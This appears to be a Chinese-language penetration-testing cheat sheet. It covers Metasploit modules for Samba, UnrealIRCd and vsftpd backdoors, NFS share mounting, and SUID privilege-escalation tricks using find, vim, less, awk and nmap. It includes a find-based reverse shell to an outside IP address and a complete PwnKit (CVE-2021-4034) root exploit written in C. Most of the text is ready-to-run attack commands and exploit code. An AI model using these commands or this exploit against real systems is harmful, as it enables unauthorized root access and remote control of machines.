metasploit

Samba(139:445)

1
msf > search cve:2017-7494
1
2
3
4
5
msfconsole
use exploit/linux/samba/is_known_pipename
set rhost 172.2.123.6
set RPORT 445
exploit

UnrealIRCd (6667)

1
exploit/linux/irc/unreal_ircd_3281_backdoor

vsftpd 2.3.4 (21)

1
exploit/unix/ftp/vsftpd_234_backdoor

nfs

共享文件系统

查看共享了那些目录

1
showmount -e 192.168.57.3

mount挂载

1
mount -t nfs 192.168.57.3:/ /mnt/metasploitable2/

SUID利用

查找命令

1
2
3
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;

bash

直接进入root交互

1
bash -p

find

指定一个文件然后执行任意命令

1
2
3
find /etc/passwd -exec whoami \;

find /etc/passwd -exec bash -c 'bash -i >& /dev/tcp/101.37.210.236/2333 0>&1' \;

nmap

早期nmap版本带有交互模式,因而允许用户执行shell命令,适用版本:nmap2.02至5.21

1
nmap --interactive

vim

如果以SUID运行,可以读取硬盘所有文件

执行命令

1
2
:!ls -la
:whoami

把命令执行结果粘贴在光标所在行

1
:read !ls -la

cp

覆盖系统文件

nano

1
2
3
nano #进入nano编辑器
Ctrl + R
Ctrl + X

less、more

先指定文件查看,然后执行命令

1
2
3
less /etc/passwd

:!ls -la

awk

1
2
3
4
5
awk '{system("ls")}'
需要再换行才能执行命令结果

awk 'BEGIN {system("/bin/bash")}'
直接输出命令结果

pkexec

尝试CVE-2021-4034

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
/*
 * Proof of Concept for PwnKit: Local Privilege Escalation Vulnerability
 * Discovered in polkit’s pkexec (CVE-2021-4034) by Andris Raugulis
 * <moo@arthepsy.eu> Advisory:
 * https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char *shell = "#include <stdio.h>\n"
              "#include <stdlib.h>\n"
              "#include <unistd.h>\n\n"
              "void gconv() {}\n"
              "void gconv_init() {\n"
              "	setuid(0); setgid(0);\n"
              "	seteuid(0); setegid(0);\n"
              "	system(\"export "
              "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/"
              "bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"
              "	exit(0);\n"
              "}";

int main(int argc, char *argv[]) {
  FILE *fp;
  system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x "
         "'GCONV_PATH=./pwnkit'");
  system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > "
         "pwnkit/gconv-modules");
  fp = fopen("pwnkit/pwnkit.c", "w");
  fprintf(fp, "%s", shell);
  fclose(fp);
  system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
  char *env[] = {"pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT",
                 "SHELL=pwnkit", NULL};
  execve("/usr/bin/pkexec", (char *[]){NULL}, env);
}